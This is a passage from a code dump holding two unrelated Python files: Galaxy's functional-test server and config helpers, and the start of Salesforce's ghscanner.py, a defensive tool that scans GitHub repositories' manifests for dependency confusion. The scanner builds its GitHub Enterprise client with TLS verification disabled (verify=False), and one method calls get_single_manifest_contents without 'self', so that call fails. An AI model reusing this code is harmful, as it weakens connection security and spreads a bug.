conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_conf,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
)
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = "sqlalchemy+sqlite:///%s?isolation_level=IMMEDIATE" % os.path.join(tmpdir, "control.sqlite")
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=[], plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception("Failed to copy database template from source %s" % source)
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = "%s_TEST_DBURI" % prefix
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = "gxtest" + ''.join(random.choice(string.ascii_uppercase) for _ in range(10))
actual_database_parsed = database_template_parsed._replace(path="/%s" % actual_db)
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = "%s.sqlite" % prefix.lower()
template_var = "%s_TEST_DB_TEMPLATE" % prefix
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = "%s_TEST_DBPATH" % prefix
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for i in range(sleep_tries):
# directly test the app, not the proxy
conn = http_client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except socket.error as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_ports(port):
if port is not None:
yield port
raise Exception("An existing process seems bound to specified test server port [%s]" % port)
else:
random.seed()
for i in range(0, 9):
port = str(random.randint(8000, 10000))
yield port
raise Exception("Unable to open a port between %s and %s to start Galaxy server" % (8000, 10000))
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
for port in attempt_ports(port):
try:
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
break
except socket.error as e:
if e[0] == 98:
continue
raise
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info("GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir)
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
class classproperty(object):
def __init__(self, f):
self.f = f
def __get__(self, obj, owner):
return self.f(owner)
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode('utf-8'))
)[20:24])
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
port_random_env_key = "%s_TEST_PORT_RANDOM" % prefix
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = "%s_TEST_HOST" % prefix
port_env_key = "%s_TEST_PORT" % prefix
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper(object):
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class PasteServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port):
super(PasteServerWrapper, self).__init__(name, host, port)
self._app = app
self._server = server
@property
def app(self):
return self._app
def stop(self):
if self._server is not None:
log.info("Shutting down embedded %s web server" % self.name)
self._server.server_close()
log.info("Embedded web server %s stopped" % self.name)
if self._app is not None:
log.info("Stopping application %s" % self.name)
self._app.shutdown()
log.info("Application %s stopped." % self.name)
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super(UwsgiServerWrapper, self).__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
config["galaxy"]["interactivetools_prefix"] = "interactivetool"
config["galaxy"]["interactivetools_map"] = os.path.join(tempdir, "interactivetools_map.sqlite")
config['galaxy']['interactivetools_enable'] = True
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path, "r") as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
"%s:%s" % (host, port),
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for p in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(p)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex_quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
for port in attempt_ports(port):
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info("Test-managed uwsgi web server for %s started at %s:%s" % (name, host, port))
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info("Embedded paste web server for %s started at %s:%s" % (name, host, port))
return PasteServerWrapper(
app, server, name, host, port
)
class TestDriver(object):
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = os.environ.get('GALAXY_TEST_UWSGI', None)
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if hasattr(galaxy_config, '__call__'):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False)
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info("Functional tests will be run against external Galaxy server %s:%s" % (server_wrapper.host, server_wrapper.port))
self.server_wrappers.append(server_wrapper)
else:
log.info("Functional tests will be run against test managed Galaxy server %s" % self.external_galaxy)
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_master_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters={}):
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_master_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
def setup_keep_outdir():
keep_outdir = os.environ.get('GALAXY_TEST_SAVE', '')
if keep_outdir > '':
try:
os.makedirs(keep_outdir)
except Exception:
pass
return keep_outdir
def target_url_parts():
host = socket.gethostbyname(os.environ.get('GALAXY_TEST_HOST', DEFAULT_WEB_HOST))
port = os.environ.get('GALAXY_TEST_PORT')
default_url = "http://%s:%s" % (host, port)
url = os.environ.get('GALAXY_TEST_EXTERNAL', default_url)
return host, port, url
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_keep_outdir",
"setup_galaxy_config",
"target_url_parts",
"TestDriver",
"wait_for_http_server",
)
|
ghscanner.py | #
# Copyright (c) 2021, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
import concurrent.futures
import time
import json
import os
import multiprocessing
from github3 import GitHub, GitHubEnterprise
from contentscanner import Scanner
class GHScanner:
def __init__(self, conc=200, procs=4, public=False):
self.RateWarning = False
self.conc = conc
self.procs = procs
self.public = public
#GitHub API wrapper
if public:
self.GH = GitHub(os.getenv("GITHUB_URL"), token=os.getenv("GITHUB_AUTH"))
else:
self.GH = GitHubEnterprise(os.getenv("GITHUB_URL"), token=os.getenv("GITHUB_AUTH"), verify=False)
self.FILESCANNER = Scanner("./modules", "modules.json")
#scans all orgs in git server
def scan_all_orgs(self):
starttime = time.time()
results = {'orgs_scanned': 0, 'repos_scanned': 0, 'vulnerable': 0, 'sus': 0, 'time_elapsed': 0, 'orgs':[]}
print("Retrieving org list...")
orgslist = self.check_orgs()
print(f"Done - {len(orgslist)} items retrieved!")
try:
#chunk the list of orgs for co-processing
orgchunks = list(self.chunks(orgslist, self.procs))
processes = []
rets = []
#run each chunk with a different process
resultqueue = multiprocessing.Queue()
for chunk in orgchunks:
tmp = multiprocessing.Process(target=self.check_org_chunk, args=(resultqueue, chunk, self.conc, self.procs, self.public))
processes.append(tmp)
tmp.start()
for process in processes:
res = resultqueue.get()
rets = rets + res
for process in processes:
process.join()
results['orgs'] = rets
#error check
for org in results['orgs']:
if 'errors' in org:
for repo in org['errors']:
print(f"Retrying: {repo}...")
tmp = self.check_single_repo(org['org'], repo)
index = next((index for (index, d) in enumerate(org['repos']) if d["repo"] == repo), None)
org['repos'][index] = tmp
#do recap
results['time_elapsed'] = time.time() - starttime
results['orgs_scanned'] = len(orgslist)
return results
except Exception as e:
print(f"Error: {e} in scan_all_orgs")
# get list of orgs
def check_orgs(self):
results = []
try:
orgs = self.GH.organizations()
for org in orgs:
results.append(org.login)
except Exception as e:
#print(f"Error: {e} in check_orgs")
raise
return results
#checks a single gh organization
def check_single_org(self, org):
jsonresult = {org:[], 'errors': []}
starttime = time.time()
try:
#load up the repos for this org
repos = self.check_repos(org)
#check each repo with a new thread (up to n=conc threads)
with concurrent.futures.ThreadPoolExecutor(max_workers=self.conc) as executor:
fut = [executor.submit(self.check_single_repo, org, repository) for repository in repos]
for r in concurrent.futures.as_completed(fut):
#if there is an error, ad it to the error list
scanresult = r.result()
if 'errors' in scanresult:
jsonresult['errors'].append(scanresult['repo'])
jsonresult[org].append(scanresult)
except Exception as e:
print(f"Error: {e} in check_single_org({org})")
jsonresult['errors'].append(f"check_single_org({org})")
if len(jsonresult['errors']) == 0:
del jsonresult['errors']
jsonresult['scan_time'] = time.time() - starttime
return jsonresult
# gets a list of repos for a git org
def check_repos(self, org):
ret = []
try:
organization = self.GH.organization(org)
repos = organization.repositories(type="all")
for repo in repos:
ret.append(repo.name)
except Exception as e:
print(f"Error: {e} in check_repos")
raise
return ret
# checks a single repo for dependency confusion (now with threading!)
def check_single_repo(self, org, repo):
jsonresult = {repo: [], 'errors': []}
try:
#check rate limits and sleep if need be
core = self.GH.rate_limit()['resources']['core']
if int(core['remaining']) < 500:
resettime = int(core['reset'])
sleepamount = resettime - int(time.time())
#if we havent said we are pausing yet, do so now
if not self.RateWarning:
print(f"GIT API RATE LIMIT HIT, SLEEPING FOR: {sleepamount} seconds")
self.RateWarning = True
#pause until the rate limiter resets
time.sleep(sleepamount + 2)
self.RateWarning = False
repository = self.GH.repository(org, repo)
#grab packages from this repo and pull the dependencies from them
files = self.check_repo(repository)
filecontents = self.get_all_manifest_contents(files, repository)
for file in filecontents:
#scan it
scanresult = self.FILESCANNER.scan_contents(file['file'], file['content'], file['override'])
#if we had errors, bubble them up
if 'errors' in scanresult:
jsonresult['errors'].append(scanresult['errors'])
else:
jsonresult[repo].append(scanresult)
#remove empty errors
if len(jsonresult['errors']) == 0:
del jsonresult['errors']
except Exception as e:
if "new thread" not in str(e) and "repository is empty" not in str(e):
print(f"{org} : {repo} : Error: {e} in check_single_repo")
return jsonresult
#traverses a git repo and finds manifest files
def check_repo(self, repo):
files = []
try:
contents = repo.directory_contents("", return_as=dict)
overrides = []
for file in contents:
f = contents[file]
for module in self.FILESCANNER.MODULES['modules']:
if f.path.lower() in module['manifest_file'] or f.path.lower() in module['lock_file'] or ('config_file' in module and f.path.lower() == module['config_file']):
if 'config_file' in module and f.path.lower() == module['config_file']:
if module['config_parse_func'](get_single_manifest_contents(repo, {'name': f.path, 'override': False})):
overrides = overrides + module['manifest_file'] + module['lock_file']
else:
files.append({'name': f.path, 'override': False})
if f.path.lower() in module['lock_file']:
for file in module['manifest_file'] + module['lock_file'][:-1]:
if not f.path.lower() == file.lower():
overrides.append(file)
break
overrides = list(set(overrides))
for f in files:
if f['name'] in overrides:
f['override'] = True
except Exception as e:
#print(f"Error: {e} in check_repo")
raise
return files
#grabs manifest file contents from git (but with threads this time!)
def get_single_manifest_contents(self, repo, file):
try:
if file['override']:
return {'file': file['name'], 'content': '', 'override': True}
content = repo.file_contents(file['name']).decoded.decode("utf-8")
return {'file': file['name'], 'content': content, 'override': False}
except Exception as e:
#print(f"Error: {e} in ({filename}) get_single_manifest_contents")
raise
#grabs all manifest file contents from git
def get_all_manifest_contents(self, files, repo):
if not files or len(files) == 0:
return []
filecontents = []
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
fut = [executor.submit(self.get_single_manifest_contents, repo, file) for file in files]
for r in concurrent.futures.as_completed(fut):
tmp = r.result()
if tmp is not None:
filecontents.append(r.result())
except Exception as e:
#print(f"Error: {e} in get_all_manifest_contents")
raise
return filecontents
#Yield n number of striped chunks from l.
@staticmethod
def chunks(l, n):
for i in range(0, n):
yield l[i::n]
#checks a list of orgs for dependency confusion
@staticmethod
